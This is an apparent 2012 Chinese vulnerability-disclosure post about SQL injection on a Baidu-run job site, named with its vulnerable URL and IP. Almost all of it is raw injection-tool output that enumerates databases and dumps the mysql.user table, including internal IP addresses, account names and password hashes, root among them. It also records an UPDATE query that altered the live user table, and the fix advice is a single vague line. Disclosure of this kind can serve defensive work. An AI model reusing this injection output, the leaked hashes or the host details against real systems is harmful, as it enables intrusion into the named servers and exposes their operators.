百度某站存在SQL注射漏洞

2012-7-16 16:37:49 来源:网络转载 浏览:255
百度最新漏洞公布:百度某站存在SQL注射漏洞。

简要描述:
百度某站存在安全隐患,可渗透致内网拿下33台服务器。
为了保护这个站,肯定是不能说的。
哎,36台服务器的,除去本机的,就是33台内网服务器的。
口令就不说了。
权限的话就不说了,跑表都跑死人。
方向木有泄露出的。
伤不起啊,伤不起。
由于某个注入引发的血案啊,血案啊。

详细说明:
血案凶手:http://www.baijob.com/p/Searchcompany/industry?id=9&parent_id=1

百度某站SQL注射漏洞

 

 

Analyzing http://www.baijob.com/p/Searchcompany/industry?id=9&parent_id=1
Host IP: 58.68.231.87
Web Server: Apache
Powered-by: PHP/5.3.10
Keyword Found: Application
Injection type is Integer
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 2
Valid String Column is 2
DB Server: MySQL
Current DB: sr_spider
Count(table_name) of information_schema.tables where table_schema=0x73725F737069646572 is 1854
Tables found: bi_test,bi_test_sr_entity,company,company_detail,e_p_config,e_perm,e_project,e_r_p_map,e_role,e_u_company,e_u_p_map,e_u_r_map,import_data_log,job,job_profession_info,model_sample,rc_tags,rc_tags_relation,search_ratings,sr_address,sr_base,sr_base_bak,sr_base_dict,sr_base_property,sr_company_search,sr_company_spider,sr_data_trans_log,sr_data_trans_log_20120419,sr_def_base_mapping,sr_entity,sr_entity_md5,sr_entity_resume,sr_fetch_website,sr_field_data_1,sr_field_data_10,sr_field_data_100,sr_field_data_1000,sr_field_data_101,sr_field_data_102,sr_field_data_103,sr_field_data_104,sr_field_data_105,sr_field_data_106,sr_field_data_107,sr_field_data_108,sr_field_data_109,sr_field_data_11,sr_field_data_110,sr_field_data_111,sr_field_data_112,sr_field_data_113,sr_field_data_114,sr_field_data_115,sr_field_data_116,sr_field_data_117,sr_field_data_118,sr_field_data_119,sr_field_data_12,sr_field_data_120,sr_field_data_121,sr_field_data_122,sr_field_data_123,sr_field_data_124,sr_field_data_125,sr_field_data_126,sr_field_data
Can not get all tables by group_concat!
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x62695F74657374 is 6
Column found: id
Column found: url
Column found: visit_time
Column found: ip
Canceling...
Column found: ts
Job Canceled!
Data Base Found: information_schema
Data Base Found: joblog
Data Base Found: mysql
Data Base Found: sr_campus
Data Base Found: sr_commons
Data Base Found: sr_company
Data Base Found: sr_resume
Data Base Found: sr_spider
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x655F705F636F6E666967 is 16
Column found: ID
Column found: Project_ID
Column found: Rerole
Column found: Relogo
Column found: Reoneurl
Column found: Reurl
Column found: Reitem
Column found: Loginlogo
Canceling...
Column found: Loginurl
Job Canceled!
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x696D706F72745F646174615F6C6F67 is 3
Column found: id
Column found: desc
Column found: type
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x6A6F62 is 45
Column found: id
Column found: company_id
Column found: company_admin_id
Column found: job_title
Column found: job_code
Column found: email
Column found: send_flag
Column found: address
Column found: number
Column found: type
Column found: salary
Column found: age
Column found: education
Column found: language1
Column found: language1_value
Column found: language2
Column found: language2_value
Column found: major1
Column found: major2
Column found: work_type
Column found: work_year
Column found: description_cn
Column found: description_en
Column found: auto_reply_flag
Column found: auto_reply_content
Column found: intime
Column found: endtime
Column found: freshtime
Column found: status
Column found: import_flag
Column found: import_url
Column found: pass_flag
Column found: department_id
Column found: salary_show_discuss
Column found: order_seq
Column found: apply_num
Column found: email_model_id
Column found: modify_time
Column found: workplace
Column found: profession_type
Column found: major_txt
Column found: resource
Column found: create_time
Column found: pause_time
Column found: ts
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x6A6F625F70726F66657373696F6E5F696E666F is 8
Column found: level1
Column found: level1_name
Column found: level2
Column found: level2_name
Column found: profession_type_id
Column found: profession_type
Column found: job_title
Column found: id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313136 is 11
Column found: id
Column found: entity_id
Column found: field_id
Column found: field_original_value
Column found: field_value
Column found: field_standard_value
Column found: Schema_id
Column found: Inspection
Column found: STATUS
Column found: User_id
Column found: system_id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313137 is 11
Column found: id
Column found: entity_id
Column found: field_id
Column found: field_original_value
Column found: field_value
Column found: field_standard_value
Column found: Schema_id
Column found: Inspection
Column found: STATUS
Column found: User_id
Column found: system_id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313138 is 11
Column found: id
Column found: entity_id
Column found: field_id
Column found: field_original_value
Column found: field_value
Column found: field_standard_value
Column found: Schema_id
Column found: Inspection
Column found: STATUS
Column found: User_id
Column found: system_id
Count(column_name) of information_schema.columns where table_schema=0x73725F737069646572 and table_name=0x73725F6669656C645F646174615F313139 is 11
Column found: id
Canceling...
Column found: entity_id
Job Canceled!
Count(table_name) of information_schema.tables where table_schema=0x6D7973716C is 23
Table found: columns_priv
Table found: db
Table found: event
Table found: func
Table found: general_log
Table found: help_category
Table found: help_keyword
Table found: help_relation
Table found: help_topic
Table found: host
Table found: ndb_binlog_index
Table found: plugin
Table found: proc
Table found: procs_priv
Table found: servers
Table found: slow_log
Table found: tables_priv
Table found: time_zone
Table found: time_zone_leap_second
Table found: time_zone_name
Table found: time_zone_transition
Table found: time_zone_transition_type
Table found: user
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x636F6C756D6E735F70726976 is 7
Column found: Host
Column found: Db
Column found: User
Column found: Table_name
Column found: Column_name
Column found: Timestamp
Column found: Column_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6462 is 22
Column found: Host
Column found: Db
Column found: User
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Column found: Create_priv
Column found: Drop_priv
Column found: Grant_priv
Column found: References_priv
Column found: Index_priv
Column found: Alter_priv
Column found: Create_tmp_table_priv
Column found: Lock_tables_priv
Column found: Create_view_priv
Column found: Show_view_priv
Column found: Create_routine_priv
Column found: Alter_routine_priv
Column found: Execute_priv
Column found: Event_priv
Column found: Trigger_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6576656E74 is 22
Column found: db
Column found: name
Column found: body
Column found: definer
Column found: execute_at
Column found: interval_value
Column found: interval_field
Column found: created
Column found: modified
Column found: last_executed
Column found: starts
Column found: ends
Column found: status
Column found: on_completion
Column found: sql_mode
Column found: comment
Column found: originator
Column found: time_zone
Column found: character_set_client
Column found: collation_connection
Column found: db_collation
Column found: body_utf8
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x66756E63 is 4
Column found: name
Column found: ret
Column found: dl
Column found: type
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x67656E6572616C5F6C6F67 is 6
Column found: event_time
Column found: user_host
Column found: thread_id
Column found: server_id
Column found: command_type
Column found: argument
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F63617465676F7279 is 4
Column found: help_category_id
Column found: name
Column found: parent_category_id
Column found: url
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F6B6579776F7264 is 2
Column found: help_keyword_id
Column found: name
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F72656C6174696F6E is 2
Column found: help_topic_id
Column found: help_keyword_id
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x68656C705F746F706963 is 6
Column found: help_topic_id
Column found: name
Column found: help_category_id
Column found: description
Column found: example
Column found: url
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x686F7374 is 20
Column found: Host
Column found: Db
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Column found: Create_priv
Column found: Drop_priv
Column found: Grant_priv
Column found: References_priv
Column found: Index_priv
Column found: Alter_priv
Column found: Create_tmp_table_priv
Column found: Lock_tables_priv
Column found: Create_view_priv
Column found: Show_view_priv
Column found: Create_routine_priv
Column found: Alter_routine_priv
Column found: Execute_priv
Column found: Trigger_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x6E64625F62696E6C6F675F696E646578 is 7
Column found: Position
Column found: File
Column found: epoch
Column found: inserts
Column found: updates
Column found: deletes
Column found: schemaops
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x706C7567696E is 2
Column found: name
Column found: dl
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x70726F63 is 20
Column found: db
Column found: name
Column found: type
Column found: specific_name
Column found: language
Column found: sql_data_access
Column found: is_deterministic
Column found: security_type
Column found: param_list
Column found: returns
Column found: body
Column found: definer
Column found: created
Column found: modified
Column found: sql_mode
Column found: comment
Column found: character_set_client
Column found: collation_connection
Column found: db_collation
Column found: body_utf8
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x70726F63735F70726976 is 8
Column found: Host
Column found: Db
Column found: User
Column found: Routine_name
Column found: Routine_type
Column found: Grantor
Column found: Proc_priv
Column found: Timestamp
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x73657276657273 is 9
Column found: Server_name
Column found: Host
Column found: Db
Column found: Username
Column found: Password
Column found: Port
Column found: Socket
Column found: Wrapper
Column found: Owner
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x736C6F775F6C6F67 is 11
Column found: start_time
Column found: user_host
Column found: query_time
Column found: lock_time
Column found: rows_sent
Column found: rows_examined
Column found: db
Column found: last_insert_id
Column found: insert_id
Column found: server_id
Column found: sql_text
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x7461626C65735F70726976 is 8
Column found: Host
Column found: Db
Column found: User
Column found: Table_name
Column found: Grantor
Column found: Timestamp
Column found: Table_priv
Column found: Column_priv
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E65 is 2
Column found: Time_zone_id
Column found: Use_leap_seconds
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F6C6561705F7365636F6E64 is 2
Column found: Transition_time
Column found: Correction
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F6E616D65 is 2
Column found: Name
Column found: Time_zone_id
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F7472616E736974696F6E is 3
Column found: Time_zone_id
Column found: Transition_time
Column found: Transition_type_id
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x74696D655F7A6F6E655F7472616E736974696F6E5F74797065 is 5
Column found: Time_zone_id
Column found: Transition_type_id
Column found: Offset
Column found: Is_DST
Column found: Abbreviation
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x75736572 is 39
Column found: Host
Column found: User
Column found: Password
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Column found: Create_priv
Column found: Drop_priv
Column found: Reload_priv
Column found: Shutdown_priv
Column found: Process_priv
Column found: File_priv
Column found: Grant_priv
Column found: References_priv
Column found: Index_priv
Column found: Alter_priv
Column found: Show_db_priv
Column found: Super_priv
Canceling...
Column found: Create_tmp_table_priv
Job Canceled!
Count(column_name) of information_schema.columns where table_schema=0x6D7973716C and table_name=0x75736572 is 39
Column found: Host
Column found: User
Column found: Password
Column found: Select_priv
Column found: Insert_priv
Column found: Update_priv
Column found: Delete_priv
Canceling...
Column found: Create_priv
Job Canceled!
Count(*) of mysql.user is 36
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=bi_select
Data Found: Host=10.30.20.30
Data Found: Password=*1E8BCA2F8283E302C66EEE85CA4544162AD58EC0
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.54
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.72
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.73
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.84
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.93
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.94
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.56
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.57
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=cactiuser
Data Found: Host=10.20.10.26
Data Found: Password=*02C40237B6A2F896C7CB8F5725BEB9C721987587
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.222
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.106
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.107
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.91
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.51
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.52
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.224
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.53
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.27
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Turning off 'bypass illegal union' and retrying!
Data Found: User=
Data Found: Host=db1.search.cn2
Turning on 'bypass illegal union' and retrying!
Data Found: Password=
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.22
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.32
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.40
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.41
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.42
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.43
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=N
Data Found: User=sespider
Data Found: Host=10.30.10.47
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.20.10.59
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=khdtestselect
Data Found: Host=10.20.20.20
Data Found: Password=*D6A60A2C4BD4D834EC8C3D83F8A72AE8BD207CE8
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.45
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.44
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.49
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=N
Data Found: Update_priv=N
Data Found: Select_priv=Y
Data Found: User=sespider
Data Found: Host=10.30.10.48
Data Found: Password=*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89
Data Found: Delete_priv=Y
Data Found: Update_priv=Y
Data Found: Select_priv=Y
Data Found: User=root
Data Found: Host=127.0.0.1
Data Found: Password=*60EED9B438C83464F8298E48B216C453D1EAEDC1
Data Found: Delete_priv=Y
Data Found: Update_priv=Y
Data Found: Select_priv=Y
Data Found: User=root
Data Found: Host=db1.search.cn2
Turning off 'bypass illegal union' and retrying!
Data Found: Password=
Data Found: Delete_priv=Y
Data Found: Update_priv=Y
Data Found: Select_priv=Y
Data Found: User=root
Data Found: Host=localhost
Data Found: Password=*60EED9B438C83464F8298E48B216C453D1EAEDC1
Query: UPDATE mysql.user SET Host='' where Delete_priv='N' and Update_priv='N' and Select_priv='Y' and User='sespider' and Host='10.30.10.49' and Password='*F76CB2FE25A0A5551734F2D86EF7F6557B0DFD89'

以上昨晚我数的是33台内网服务器,就这样暴漏了。哎,而且服务器的口令大部分都是同一个,悲剧哥啊.

修复方案:
加强安全体系,这样的血案还是比较典型啊!

(0)
(0)